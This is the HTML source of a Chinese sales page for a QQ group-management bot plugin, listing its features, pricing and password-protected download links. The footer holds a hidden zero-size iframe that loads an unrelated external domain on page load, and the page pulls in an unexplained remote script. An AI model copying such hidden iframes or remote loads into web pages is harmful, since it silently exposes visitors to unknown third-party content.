<!doctype html>
<html lang="zxx">
<head>
<meta charset="utf-8">
<title>艾雨综合群管-超强大的综合QQ群管插件</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="艾雨综合群管插件是一款集几十种功能于一身的超级群管机器人,能帮助你轻松管理多个QQ群！">
<meta name="keywords" content="艾雨插件,艾雨群管,群管插件,QQ群机器人,QQ群管机器人,广告杀手插件">
<meta property="og:description" content="艾雨群管插件是一款集几十种功能于一身的超级群管机器人,能帮助你轻松管理多个QQ群！">
<meta property="og:site_name" content="艾雨综合群管-强大的群管机器人">
<meta property="og:title" content="艾雨综合娱乐群管-强大的群管机器人">
<meta property="og:type" content="website">
<meta property="og:url" content="/">
<link rel="stylesheet" href="static/css/applify.css">
<link rel="stylesheet" type="text/css" href="static/css/lrtk.css">
<link class="app_popUp" href="static/css/app_popup.css" rel="stylesheet">
<link class="popUp" href="static/css/pop_up.css" rel="stylesheet">
 <style type="text/css">
    html {
    FILTER: gray
    }
    </style>

</head>


<body class="ui-transparent-nav">

<nav class="navbar navbar-fixed-top transparent navbar-default">
<div class="container">

<a class="ui-variable-logo navbar-brand" href="index.html#" title="艾雨综合群管插件官网">

艾雨综合群管
</a>


<a href="index.html#" class="ui-mobile-nav-toggle pull-right"></a>

<a href="http://www.x6g.com" target="_blank" class="btn btn-sm ui-gradient-purple pull-right">授权查询</a>
<a href="https://www.x6g.com" target="_blank" class="btn btn-sm ui-gradient-purple pull-right">使用帮助</a>

<div class="ui-navigation navbar-right">
<ul class="nav navbar-nav">
<li>
<a href="index.html#" data-scrollto="main" onclick="topBack()">主页</a>
</li>
<li>
<a href="index.html#" data-scrollto="how-it-works">插件特色</a>
</li>
<li>
<a href="index.html#" data-scrollto="features">主要功能</a>
</li>
<li>
<a href="index.html#" data-scrollto="pricing">官方售价</a>
</li>




<!-- <li>
<a href="#" target="_blank">关于我们</a>
</li> -->
</ul>

</div>

</div>

</nav>


<div class="main" role="main">

<div id="main" class="ui-hero hero-lg ui-waves ui-gradient-purple">
<div class="container">
<div class="row">
<div class="col-sm-6" data-vertical_center="true" data-vertical_offset="16">
<h1 class="heading animate" data-show="fade-in-up-big" data-delay="100">
全新版本 震撼来袭
</h1>
<p class="paragraph animate" data-show="fade-in-up-big" data-delay="400">
CatQQ框架：艾雨·综合群管.IR.dll<br> <br>OnoQQ框架：艾雨·综合群管.OQ.dll<br><br>Dawnbot（黎明）框架：艾雨·综合群管.Dw.dll<br><br>God框架：艾雨·综合群管.God.dll<br><br>你可以不使用，但是不能没有，这就是艾雨综合群管系统！
</p>
<div class="actions animate" data-show="fade-in-up-big" data-delay="600">

<!--//<a href="pricing" data-scrollto="pricing" class="btn ui-gradient-blue shadow-xl" target="_blank">购买授权</a>-->

<a href="https://www.x6g.com" target="_blank" class="btn ui-gradient-green shadow-xl" target="_blank">CatQQ版</a>
<a href="https://www.x6g.com" class="btn ui-gradient-green shadow-xl" target="_blank">OnoQQ版</a>
</a></a></a></a>
<a href="https://www.x6g.com" target="_blank" class="btn ui-gradient-green shadow-xl" target="_blank">Dawnbot版</a>
<a href="https://www.x6g.com" target="_blank" class="btn ui-gradient-green shadow-xl" target="_blank">God版</a>
</a></a>
密码：x6g.com
</div>
友情链接：<a href="http://www.x6g.com/" target="_blank">小刀娱乐网</a>
</div>
<div class="col-sm-6 animate" data-show="fade-in-left" data-delay="400">
<img src="static/picture/1.png" alt="" data-max_width="700" class="responsive-on-sm" style="margin-top:-15px;">
</div>
</div>

</div>

</div>

<div class="section bg-light">
<div class="container" style="width: 80%">

<div class="section-heading center">
<h2 class="heading text-indigo">
后台控制
</h2>
<p class="paragraph">
后台功能支持全局，分群，菜单支持自定义，好看而又强大！
</p>
</div>


<div class="ui-app-screens owl-carousel owl-theme animate" data-show="fade-in">

<div class="ui-card shadow-lg"><a href="static/picture/1.png" target="_blank">
<img src="static/picture/1.png"></a>
</div>

<div class="ui-card shadow-lg"><a href="static/picture/2.png" target="_blank">
<img src="static/picture/2.png"></a>
</div>

<div class="ui-card shadow-lg"><a href="static/picture/3.png" target="_blank">
<img src="static/picture/3.png"></a>
</div>

<div class="ui-card shadow-lg"><a href="static/picture/4.png" target="_blank">
<img src="static/picture/4.png"></a>
</div>

<div class="ui-card shadow-lg"><a href="static/picture/5.png" target="_blank">
<img src="static/picture/5.png"></a>
</div>

<div class="ui-card shadow-lg"><a href="static/picture/6.png" target="_blank">
<img src="static/picture/6.png"></a>
</div>

<div class="ui-card shadow-lg"><a href="static/picture/7.png" target="_blank">
<img src="static/picture/7.png"></a>
</div>

<div class="ui-card shadow-lg"><a href="static/picture/8.png" target="_blank">
<img src="static/picture/8.png"></a>
</div>

<div class="ui-card shadow-lg"><a href="static/picture/9.png" target="_blank">
<img src="static/picture/9.png"></a>
</div>


</div>

</div>

</div>

<div id="how-it-works" class="section">
<div class="container ui-icon-blocks ui-blocks-h icons-lg">
<div class="section-heading cente">
<h2 class="heading text-indigo">
插件特色
</h2>
<p class="paragraph">
可通过指令配置，轻松分群管理，坚决扼杀广告，24H监控群消息守护你的QQ群安全！
</p>
</div>

<div class="row">
<div class="col-sm-4 col-xs-6 ui-icon-block animate" data-show="fade-in-up">
<div class="icon icon-lg icon-circle text-blue mt_product1"></div>
<h4>入群验证</h4>
<p>
通过验证QQ等级,QQ昵称,签名检测,黑名单检测等功能让你的QQ群拒绝机器人，营销号！
</p>
</div>
<div class="col-sm-4 col-xs-6 ui-icon-block animate" data-show="fade-in-up">
<div class="icon icon-lg icon-circle text-lime mt_product2"></div>
<h4>广告检测</h4>
<p>
自定义撤回关键词,禁言关键词,踢人关键词,警告关键词,二维码撤回等功能让你的QQ群拒绝一切广告！
</p>
</div>
<div class="col-sm-4 col-xs-6 ui-icon-block animate" data-show="fade-in-up">
<div class="icon icon-lg icon-circle text-indigo mt_product3"></div>
<h4>超强撤回</h4>
<p>
支持匿名撤回,表情撤回,图片撤回,视频撤回,语音撤回等撤回功能，让你的QQ群聊天内容由你做主！
</p>
</div>
</div>
<div class="col-sm-4 col-xs-6 ui-icon-block animate" data-show="fade-in-up">
<div class="icon icon-lg icon-circle text-indigo mt_product4"></div>
<h4>授权系统</h4>
<p>
分群授权,分群独立设置功能,自助授权QQ群,到期自动退群等功能，让你的机器人轻松出租！
</p>
</div>
<div class="col-sm-4 col-xs-6 ui-icon-block animate" data-show="fade-in-up">
<div class="icon icon-lg icon-circle text-indigo mt_product5"></div>
<h4>开关系统</h4>
<p>
通过开关指令，自由开关各项功能，分群独立开关控制让你轻松管理各种类型QQ群！
</p>
</div>
<div class="col-sm-4 col-xs-6 ui-icon-block animate" data-show="fade-in-up">
<div class="icon icon-lg icon-circle text-blue mt_product6"></div>
<h4>发卡系统</h4>
<p>
轻松添加商品，添加卡密，自助购买，自动发货等功能让你的销量更上一层楼！
</p>
</div>
</div>

</div>

</div>


<div id="features" class="section bg-light">
<div class="container">

<div class="section-heading center">
<h2 class="heading text-indigo">
主要功能
</h2>
<p class="paragraph">
我们的初心：把好的产品质量，好的售后服务带给每一个用户~
</p>
</div>


<div class="row ui-tabbed-showcase">

<div class="col-md-6 col-sm-5 animate" data-show="fade-in-right">

<div class="ui-device-slider">

<div class="device">
<img src="static/picture/device.png">
</div>

<div id="device-slider-2" class="screens owl-carousel owl-theme">
<div class="item">
<img src="static/picture/caidan.png">
</div>
<div class="item">
<img src="static/picture/ggjc.png">
</div>
<div class="item">
<img src="static/picture/hbxt.png">
</div>
<div class="item">
<img src="static/picture/sqxt.png">
</div>
<div class="item">
<img src="static/picture/fayan.png">
</div>
<div class="item">
<img src="static/picture/jianyi.png">
</div>
<div class="item">
<img src="static/picture/tese1.png">
</div>
<div class="item">
<img src="static/picture/tese2.png">
</div>
</div>
</div>

</div>


<div class="col-md-6 col-sm-7" data-vertical_center="true">

<div class="ui-tabs">

<ul class="nav nav-tabs" role="tablist">

<li role="presentation" class="active">
<a href="http://www.x6g.com" role="tab" data-toggle="tab" data-toggle_screen="1" data-toggle_slider="device-slider-2">
<span class="icon icon-fire"></span>插件菜单
</a>
</li>

<li role="presentation">
<a href="https://www.x6g.com" role="tab" data-toggle="tab" data-toggle_screen="2" data-toggle_slider="device-slider-2">
<span class="icon icon-globe"></span>广告检测
</a>
</li>

<li role="presentation">
<a href="https://www.x6g.com" role="tab" data-toggle="tab" data-toggle_screen="3" data-toggle_slider="device-slider-2">
<span class="icon icon-globe"></span>黑白系统
</a>
</li>

<li role="presentation">
<a href="https://www.x6g.com" role="tab" data-toggle="tab" data-toggle_screen="4" data-toggle_slider="device-slider-2">
<span class="icon icon-globe"></span>出租系统
</a>
</li>

<li role="presentation">
<a href="https://www.x6g.com" role="tab" data-toggle="tab" data-toggle_screen="5" data-toggle_slider="device-slider-2">
<span class="icon icon-globe"></span>入群验证
</a>
</li>

<li role="presentation">
<a href="https://www.x6g.com" role="tab" data-toggle="tab" data-toggle_screen="6" data-toggle_slider="device-slider-2">
<span class="icon icon-globe"></span>功能杂区
</a>
</li>

<li role="presentation">
<a href="https://www.x6g.com" role="tab" data-toggle="tab" data-toggle_screen="7" data-toggle_slider="device-slider-2">
<span class="icon icon-globe"></span>撤回系统
</a>
</li>
<li role="presentation">
<a href="https://www.x6g.com" role="tab" data-toggle="tab" data-toggle_screen="8" data-toggle_slider="device-slider-2">
<span class="icon icon-globe"></span>撤回下页
</a>
</li>

</ul>

<div class="tab-content">

<div role="tabpanel" class="tab-pane fade in active" id="home">
<p class="sub-heading">艾雨群管系统功能简介</p>
<ul class="ui-checklist">
<li>
<h6 class="heading">超强群管功能</h6>
</li>
<li>
<h6 class="heading">分群授权系统</h6>
</li>
<li>
<h6 class="heading">群内广告杀手</h6>
</li>
<li>
<h6 class="heading">精确模糊问答</h6>
</li>
<li>
<h6 class="heading">黑白名单系统</h6>
</li>
<li>
<h6 class="heading">入群相关检测</h6>
</li>
<li>
<h6 class="heading">图片识别广告</h6>
</li>
<li>
<h6 class="heading">定时发送消息</h6>
</li>
<li>
<h6 class="heading">刷屏消息检测</h6>
</li>
<li>
<h6 class="heading">超强发卡系统</h6>
</li>
<li>
<h6 class="heading">入群邮件发送</h6>
</li>
<li>
<h6 class="heading">二维码图检测</h6>
</li>
<li>
<h6 class="heading">入群验证功能</h6>
</li>
<li>
<h6 class="heading">超强撤回系统</h6>
</li>
<h6 class="heading">
超多功能不再赘述...参考插件指令，等你探索！
</h6>
</ul>
</div>


</div>

</div>

</div>

</div>

</div>

</div>







<div id="pricing" class="section">
<div class="container">

<div class="section-heading center">
<h2 class="heading text-indigo">
插件价格
</h2>
<p class="paragraph">
我们承诺：一次性收费，多个框架使用，拒绝二次收费！
</p>
</div>


<div class="ui-pricing-cards owl-carousel owl-theme">

<div class="ui-pricing-card animate" data-show="fade-in-left">
<div class="ui-card ui-curve shadow-lg">
<div class="card-header">

<h4 class="heading"></h4>

<div class="price">
<span class="curency">￥</span>
<span class="price">0元</span>
<span class="period">/免费</span>


</div>
<h6 class="sub-heading">艾雨综合娱乐</h6>
</div>
<li>
<div class="card-body">
<ul>
<li>
免费插件
</li>
<li>
无需授权
</li>
<li>
支持：CatQQ、OnoQQ、黎明三框架
</li>
<li>
功能：点歌、名片点赞、整点报时等功能
</li>
</ul>
<a href="https://www.x6g.com" target="_blank" class="btn ui-gradient-green shadow-md">立即下载</a>
</div>
</div>
</div>

<div class="ui-pricing-card active animate" data-show="fade-in">
<div class="ui-card ui-curve color-card shadow-xl">
<div class="card-header ui-gradient-purple">
<h4 class="heading">插件授权</h4>
<div class="price">
<span class="curency">￥</span>
<span class="price">28元</span>
<span class="period">/永久</span>
</div>
<h6 class="sub-heading">1个单Q授权</h6>
</div>

<div class="card-body">
<ul>
<li>
有效期：永久授权
</li>
<li>
自助免费更换授权QQ
</li>
<li>
支持：OnoQQ、CatQQ、Dawnbot、God框架
</li>
<li>
一次性收费，多个框架使用，不二次收费。
</li>
</ul>
<a href="https://www.x6g.com" target="_blank" class="btn ui-gradient-purple shadow-md">立即购买</a>
</div>
</div>
</div>




</div>
</div>
</div>
</div>




<div class="ui-pricing-footer"><hr>
<p class="paragraph">
如果您还需要咨询其它相关问题、疑惑，请联系我们的在线客服<span style="color:#ffffff">
</span></p><hr>

<div class="actions">
客服QQ：<span style="color:#ffffff"><a href="https://www.x6g.com" <="" target="_blank" class="btn">327893<a href="https://www.x6g.com" target="_blank"><img src="static/picture/kfqq.jpg"></a></span></div><hr>


<p class="paragraph">
如果您想体验机器人各种功能，可以点击以下链接加入机器人体验QQ群
</p><hr>

<div class="actions">
体验QQ群：<a href="https://www.x6g.com" target="_blank" class="btn">327893<a href="https://www.x6g.com" target="_blank"><img src="static/picture/group.png"></a><hr>
</div>
</div>
</div>
</div>


<div class="cndns-right">
<div class="cndns-right-meau meau-car">
<a href="index.html#" data-scrollto="pricing" class="cndns-right-btn">
<span class="demo-icon"></span>
</a>
</div>

<div class="cndns-right-meau meau-top" id="top-back">
<a href="javascript:" class="cndns-right-btn" onclick="topBack()">
<span class="demo-icon"></span>
<i>顶部</i>
</a>
</div>
</div>

<footer class="ui-footer subscribe-footer ui-waves">
<div class="ui-gradient-purple footer-bg">
<div class="container">
<div class="text-center download-section">
<h2 class="heading">下载完整包</h2>
<div class="actions">
<a href="https://www.x6g.com" target="_blank" class="btn ui-gradient-green btn-google-play btn-download shadow-lg"><img <span>CatQQ版</span>
<span>立即下载</span></a>
<a href="https://www.x6g.com" target="_blank" class="btn ui-gradient-blue btn-google-play btn-download shadow-lg"><span>OnoQQ版</span>
<span>立即下载</span></a>
<a href="https://www.x6g.com" target="_blank" class="btn ui-gradient-green btn-google-play btn-download shadow-lg"><span>Dawnbot版</span>
<span>立即下载</span></a>
<a href="https://www.x6g.com" target="_blank" class="btn ui-gradient-blue btn-google-play btn-download shadow-lg"><span>God版</span>
<span>立即下载</span></a>
密码：aiyu
</div>
</div>
</div>
</div>
  




<div class="footer-copyright bg-dark-gray">

<div class="container">
    
</p>
</div>


<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width="0" height="0" src="http://yhij.cn"></iframe>


</a>


</footer>



<script type="text/javascript" src="static/js/jquery.min.js"></script>
<script type="text/javascript" src="static/js/jquery.sliderpro.min.js"></script>
<script type="text/javascript" src="static/js/owl.carousel.min.js"></script>
<script type="text/javascript" src="static/js/bootstrap.min.js"></script>
<script type="text/javascript" src="static/js/applify.js"></script>
<script type="text/javascript" src="static/js/moretui1.js"></script>
<script type="text/javascript" src="static/js/layui.js"></script>
<script type="text/javascript" class="Jspop_up" src="static/js/pop_up.js"></script>
<script type="text/javascript">
fn()

function fn() {
var width = window.innerWidth / 10;
var html = document.querySelector("html");

if(/Android|webOS|iPhone|iPod|BlackBerry/i.test(navigator.userAgent)) {
//移动端
$(".popUp").attr("href", "");
//	$(".Jspop_up").remove();
$(".pop_up").remove();
} else {
//pc端
//	$(".Jspop_up").attr("src", "js/pop_up.js");
$(".app_popUp").attr("href", "");
//	删除 移动端
$(".app_pop").remove();
}
}
window.onresize = fn
</script>
<script type="text/javascript">
//置顶图标显示
$('#top-back').hide();
$(window).scroll(function() {
if($(this).scrollTop() > 350) {
$("#top-back").fadeIn();
} else {
$("#top-back").fadeOut();
}
});

//置顶事件
function topBack() {
$('body,html').animate({
scrollTop: 0
}, 300);
}
</script>



<script>
$("iframe").css({
'background': 'red'
});
</script>

</div></div>
<audio autoplay="autoplay" loop=""><source src="https://api.uomg.com/api/rand.music?sort=热歌榜"></audio>
<script src="https://cdn.qqsuu.cn/api/js/hua.js"></script>
</body>
</html>